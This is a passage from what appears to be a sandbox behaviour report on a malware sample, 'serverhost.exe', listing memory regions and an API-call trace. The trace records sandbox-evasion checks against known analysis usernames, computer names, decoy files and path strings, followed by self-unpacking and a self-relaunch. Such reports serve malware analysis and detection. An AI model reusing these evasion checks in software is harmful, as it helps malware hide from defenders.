0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2372 start_va = 0x77030000 end_va = 0x77048fff entry_point = 0x77030000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2373 start_va = 0x77060000 end_va = 0x770b6fff entry_point = 0x77060000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2374 start_va = 0x770d0000 end_va = 0x7711dfff entry_point = 0x770d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2375 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2376 start_va = 0xb0000 end_va = 0x177fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 2377 start_va = 0x750000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 2378 start_va = 0x76390000 end_va = 0x7645bfff entry_point = 0x76390000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2379 start_va = 0x767e0000 end_va = 0x767fefff entry_point = 0x767e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2380 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2381 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2382 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2383 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2384 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 2385 start_va = 0x720000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 2386 start_va = 0xa00000 end_va = 0x15fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 2387 start_va = 0x1600000 end_va = 0x19f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001600000" filename = "" Region: id = 2388 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2389 start_va = 0x1a00000 end_va = 0x1ccefff entry_point = 0x1a00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2390 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2391 start_va = 0x74020000 end_va = 0x741bdfff entry_point = 0x74020000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2392 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x1d0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2393 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2394 start_va = 0x5d0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2395 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2396 start_va = 0x400000 end_va = 0x45bfff entry_point = 0x400000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2397 start_va = 0x400000 end_va = 0x45bfff entry_point = 0x4235b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2398 start_va = 0x74f90000 end_va = 0x74f9bfff entry_point = 0x74f90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2399 start_va = 0x73ea0000 end_va = 0x73edffff entry_point = 0x73ea0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2400 start_va = 0x760000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 2401 start_va = 0x760000 end_va = 0x83efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 2402 start_va = 0x870000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 2403 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2404 start_va = 0x76970000 end_va = 0x769f2fff entry_point = 0x76970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2405 start_va = 0x400000 end_va = 0x400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2406 start_va = 0x73ee0000 end_va = 0x73fd4fff entry_point = 0x73ee0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2407 start_va = 0x73790000 end_va = 0x737b0fff entry_point = 0x73790000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2408 start_va = 0x754a0000 end_va = 0x754e4fff entry_point = 0x754a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2409 start_va = 0x410000 end_va = 0x413fff entry_point = 0x410000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2410 start_va = 0x420000 end_va = 0x43cfff entry_point = 0x420000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 2411 start_va = 0x440000 end_va = 0x440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2412 start_va = 0x75040000 end_va = 0x7504afff entry_point = 0x75040000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2413 start_va = 0x450000 end_va = 0x473fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2414 start_va = 0x73a40000 end_va = 0x73b3afff entry_point = 0x73a40000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 2415 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2416 start_va = 0x410000 end_va = 0x418fff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2417 start_va = 0x480000 end_va = 0x488fff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2418 start_va = 0x590000 end_va = 0x5b3fff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2419 start_va = 0x8b0000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 2420 start_va = 0x711a0000 end_va = 0x711ebfff entry_point = 0x711a0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2421 start_va = 0x71c90000 end_va = 0x72fe5fff entry_point = 0x71c90000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2422 start_va = 0x1e30000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 2423 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 2424 start_va = 0x6d0000 end_va = 0x717fff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 2425 start_va = 0x6d1b0000 end_va = 0x6e505fff entry_point = 0x6d1b0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2426 start_va = 0x71c90000 end_va = 0x72fe5fff entry_point = 0x71c90000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2427 start_va = 0x6d1b0000 end_va = 0x6e505fff entry_point = 0x6d1b0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2428 start_va = 0x450000 end_va = 0x461fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2429 start_va = 0x71c90000 end_va = 0x72fe5fff entry_point = 0x71c90000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2430 start_va = 0x6d1b0000 end_va = 0x6e505fff entry_point = 0x6d1b0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2431 start_va = 0x71c90000 end_va = 0x72fe5fff entry_point = 0x71c90000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2432 start_va = 0x1cd0000 end_va = 0x1d17fff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 2433 start_va = 0x6d1b0000 end_va = 0x6e505fff entry_point = 0x6d1b0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2434 start_va = 0x71c90000 end_va = 0x72fe5fff entry_point = 0x71c90000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2435 start_va = 0x6d1b0000 end_va = 0x6e505fff entry_point = 0x6d1b0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2436 start_va = 0x590000 end_va = 0x5a1fff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2437 start_va = 0x71c90000 end_va = 0x72fe5fff entry_point = 0x71c90000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2438 start_va = 0x6d1b0000 end_va = 0x6e505fff entry_point = 0x6d1b0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2439 start_va = 0x470000 end_va = 0x481fff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 2440 start_va = 0x410000 end_va = 0x41cfff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2441 start_va = 0x74f70000 end_va = 0x74f8afff entry_point = 0x74f70000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2442 start_va = 0x5b0000 end_va = 0x5bcfff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Thread: id = 103 os_tid = 0x748 [0112.225] GetConsoleCP () returned 0x0 [0112.226] GetMUILanguage () returned 0x0 [0112.226] ConvertFiberToThread () returned 0 [0112.226] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76bd0000 [0112.227] GetProcAddress (hModule=0x76bd0000, lpProcName="ReleaseCapture") returned 0x76c069f2 [0112.227] ReleaseCapture () returned 1 [0112.227] GetProcAddress (hModule=0x76bd0000, lpProcName="GetProcessWindowStation") returned 0x76bddfdc [0112.227] GetProcessWindowStation () returned 0x30 [0112.227] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x2ef7c8, cbFileInfo=0x160, uFlags=0x4200 | out: psfi=0x2ef7c8) returned 0x4aa610 [0113.519] GetProcAddress (hModule=0x76bd0000, lpProcName="GetCaretBlinkTime") returned 0x76be0d01 [0113.519] GetCaretBlinkTime () returned 0x212 [0113.519] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x2ef4bc | out: ProcedureAddress=0x2ef4bc*=0x76552fb6) returned 0x0 [0113.519] VirtualAlloc (lpAddress=0x0, dwSize=0x12000, flAllocationType=0x1000, flProtect=0x4) returned 0x470000 [0113.703] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x2ef4dc | out: ProcedureAddress=0x2ef4dc*=0x76552fb6) returned 0x0 [0113.703] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x40) returned 0x410000 [0113.703] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x2ef5bc | out: ProcedureAddress=0x2ef5bc*=0x7655395c) returned 0x0 [0113.703] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x2ef5bc | out: ProcedureAddress=0x2ef5bc*=0x765533d3) returned 0x0 [0113.704] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x2ef5bc | out: ProcedureAddress=0x2ef5bc*=0x76552fb6) returned 0x0 [0113.704] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x2ef5bc | out: ProcedureAddress=0x2ef5bc*=0x76542341) returned 0x0 [0113.704] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x2ef5bc | out: ProcedureAddress=0x2ef5bc*=0x7654db13) returned 0x0 [0113.704] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="AddVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x2ef5bc | out: ProcedureAddress=0x2ef5bc*=0x76eff774) returned 0x0 [0113.704] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="RemoveVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x2ef5bc | out: ProcedureAddress=0x2ef5bc*=0x76f6ad2e) returned 0x0 [0113.704] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76500000 [0113.704] GetProcAddress (hModule=0x76500000, lpProcName="GetModuleFileNameA") returned 0x765533f6 [0113.704] GetProcAddress (hModule=0x76500000, lpProcName="GetComputerNameA") returned 0x76536ba9 [0113.704] GetProcAddress (hModule=0x76500000, lpProcName="CloseHandle") returned 0x7654ca7c [0113.704] GetProcAddress (hModule=0x76500000, lpProcName="lstrcmpA") returned 0x76538c59 [0113.704] GetProcAddress (hModule=0x76500000, lpProcName="FreeConsole") returned 0x765abfde [0113.704] GetProcAddress (hModule=0x76500000, lpProcName="GetComputerNameExA") returned 0x7658f41f [0113.704] GetProcAddress (hModule=0x76500000, lpProcName="GetModuleHandleA") returned 0x7654cf41 [0113.704] GetProcAddress (hModule=0x76500000, lpProcName="CreateFileA") returned 0x7654cee8 [0113.704] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75340000 [0113.705] GetProcAddress (hModule=0x75340000, lpProcName="GetUserNameA") returned 0x7536a4b4 [0113.705] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x77060000 [0113.705] GetProcAddress (hModule=0x77060000, lpProcName="StrStrIA") returned 0x7706d250 [0113.705] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76ef0000 [0113.705] GetProcAddress (hModule=0x76ef0000, lpProcName="strchr") returned 0x76f37690 [0113.712] GetUserNameA (in: lpBuffer=0x2ef4ec, pcbBuffer=0x2ef2e8 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x2ef2e8) returned 1 [0113.720] GetComputerNameA (in: lpBuffer=0x2ef3ec, nSize=0x2ef2e8 | out: lpBuffer="F71GWAT", nSize=0x2ef2e8) returned 1 [0113.720] GetComputerNameExA (in: NameType=0x1, lpBuffer=0x2ef2ec, nSize=0x2ef2e8 | out: lpBuffer="F71gwat", nSize=0x2ef2e8) returned 1 [0113.720] lstrcmpA (lpString1="F71GWAT", lpString2="TEQUILABOOMBOOM") returned -1 [0113.720] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="Wilbert") returned -1 [0113.720] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0113.720] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0113.720] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John Doe") returned -1 [0113.720] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John") returned -1 [0113.720] CreateFileA (lpFileName="C:\\email.doc" (normalized: "c:\\email.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.721] CloseHandle (hObject=0xffffffff) returned 0 [0113.721] CreateFileA (lpFileName="C:\\a\\foobar.bmp" (normalized: "c:\\a\\foobar.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.721] CloseHandle (hObject=0xffffffff) returned 0 [0113.721] GetModuleHandleA (lpModuleName=0x0) returned 0x9e0000 [0113.721] GetModuleFileNameA (in: hModule=0x9e0000, lpFilename=0x2ef4fc, nSize=0x103 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0113.721] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="sample") returned 0x0 [0113.721] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="mlwr_smpl") returned 0x0 [0113.721] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="artifact.exe") returned 0x0 [0113.721] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x4) returned 0x5b0000 [0113.722] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76500000 [0113.722] GetProcAddress (hModule=0x76500000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x7653480b [0113.722] FreeConsole () returned 0 [0113.722] VirtualProtect (in: lpAddress=0x5b1000, dwSize=0x88aa, flNewProtect=0x20, lpflOldProtect=0x2ef5e4 | out: lpflOldProtect=0x2ef5e4*=0x4) returned 1 [0113.723] VirtualProtect (in: lpAddress=0x5ba000, dwSize=0xb12, flNewProtect=0x2, lpflOldProtect=0x2ef5e4 | out: lpflOldProtect=0x2ef5e4*=0x4) returned 1 [0113.723] VirtualProtect (in: lpAddress=0x5bb000, dwSize=0xbd8, flNewProtect=0x4, lpflOldProtect=0x2ef5e4 | out: lpflOldProtect=0x2ef5e4*=0x4) returned 1 [0113.723] VirtualProtect (in: lpAddress=0x5bc000, dwSize=0x4dc, flNewProtect=0x2, lpflOldProtect=0x2ef5e4 | out: lpflOldProtect=0x2ef5e4*=0x4) returned 1 [0113.723] VirtualProtect (in: lpAddress=0x5b0000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x2ef5e4 | out: lpflOldProtect=0x2ef5e4*=0x4) returned 1 [0120.403] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ef700, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0120.403] _snwprintf (in: _Dest=0x2ef908, _Count=0x40, _Format="E%X" | out: _Dest="EA991ED3B") returned 9 [0120.403] _snwprintf (in: _Dest=0x2ef988, _Count=0x40, _Format="M%X" | out: _Dest="MA991ED3B") returned 9 [0120.403] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="EA991ED3B") returned 0x150 [0120.403] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="MA991ED3B") returned 0x154 [0120.403] GetLastError () returned 0x0 [0120.404] CreateProcessW (in: lpApplicationName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2efa08*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2efa4c | out: lpCommandLine=0x0, lpProcessInformation=0x2efa4c*(hProcess=0x15c, hThread=0x158, dwProcessId=0x73c, dwThreadId=0x780)) returned 1 [0120.407] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xffffffff) returned 0x0 [0123.841] CloseHandle (hObject=0x15c) returned 1 [0123.841] CloseHandle (hObject=0x158) returned 1 [0123.841] CloseHandle (hObject=0x150) returned 1 [0123.841] CloseHandle (hObject=0x154) returned 1 [0123.841] ExitProcess (uExitCode=0x0) Thread: id = 104 os_tid = 0x784 Thread: id = 105 os_tid = 0x7b0 Process: id = "16" image_name = "serverhost.exe" filename = "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe" page_root = "0x7f1bb180" os_pid = "0x73c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x744" cmd_line = "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ecd9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2443 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2444 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2445 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2446 start_va = 0x9e0000 end_va = 0x9fafff entry_point = 0x9e1d90 region_type = mapped_file name = "serverhost.exe" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe") Region: id = 2447 start_va = 0x76ef0000 end_va = 0x7702bfff entry_point = 0x76ef0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2448 start_va = 0x77130000 end_va = 0x77130fff entry_point = 0x77130000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2449 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2450 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 2451 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2452 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2453 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2454 start_va = 0x280000 end_va = 0x2e6fff entry_point = 0x280000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2455 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 2456 start_va = 0x71b80000 end_va = 0x71c03fff entry_point = 0x71b819a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 2457 start_va = 0x75150000 end_va = 0x75161fff entry_point = 0x75151441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2458 start_va = 0x751a0000 end_va = 0x751e9fff entry_point = 0x751a7de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2459 start_va = 0x75310000 end_va = 0x75336fff entry_point = 0x753158b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2460 start_va = 0x75340000 end_va = 0x753dffff entry_point = 0x753549e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2461 start_va = 0x753e0000 end_va = 0x7546efff entry_point = 0x753e3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2462 start_va = 0x754f0000 end_va = 0x75590fff entry_point = 0x75522433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2463 start_va = 0x756a0000 end_va = 